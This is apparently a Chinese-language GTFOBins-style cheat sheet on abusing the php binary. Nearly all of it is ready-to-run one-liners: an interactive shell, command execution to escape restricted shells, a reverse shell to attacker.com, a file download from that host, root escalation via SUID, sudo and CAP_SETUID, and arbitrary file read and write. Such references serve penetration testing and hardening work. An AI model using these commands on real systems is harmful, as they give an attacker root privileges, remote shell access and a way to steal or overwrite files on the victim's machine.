.. / php

shell

用来生成一个交互式的系统shell。

export CMD="/bin/sh"
php -r 'system(getenv("CMD"));'

export CMD="/bin/sh"
php -r 'passthru(getenv("CMD"));'

export CMD="/bin/sh"
php -r 'print(shell_exec(getenv("CMD")));'

export CMD="/bin/sh"
php -r '$r=array(); exec(getenv("CMD"), $r); print(join("\\n",$r));'

export CMD="/bin/sh"
php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'

command

运行非交互式系统命令来摆脱受限环境。

export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'

reverse-shell

向监听的端口发送反向shell，以打开远程网络访问。

Run nc -l -p 12345 on the attacker box to receive the shell.

export RHOST=attacker.com
export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'

file-upload

上传文件到外部。

Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
```
LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT
```

file-download

下载远程文件。

Fetch a remote file via HTTP GET request.

export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'

suid

suid是一种授予文件的权限类型，它允许用户使用者以文件所有者的权限来执行文件。

CMD="/bin/sh"
./php -r "pcntl_exec('/bin/sh', ['-p']);"

sudo

如果二进制文件被 sudo 允许以超级用户身份运行，可能被用于访问文件系统、提升或维持特权访问。

CMD="/bin/sh"
sudo php -r "system('$CMD');"

capabilities

如果二进制文件具有设置的 Linux CAP_SETUID 能力，或者由另一个具有该能力的二进制文件执行，它可以被用作后门，通过操纵自身的进程 UID 来维持特权访问。

CMD="/bin/sh"
./php -r "posix_setuid(0); system('$CMD');"

file-read

从文件中读取数据。

export LFILE=要读取的文件路径
php -r 'readfile(getenv("LFILE"));'

file-write

将数据写入文件中。

write data to a file, filename should be absolute.

export LFILE=要写入的文件
php -r 'file_put_contents(getenv("LFILE"), "DATA");'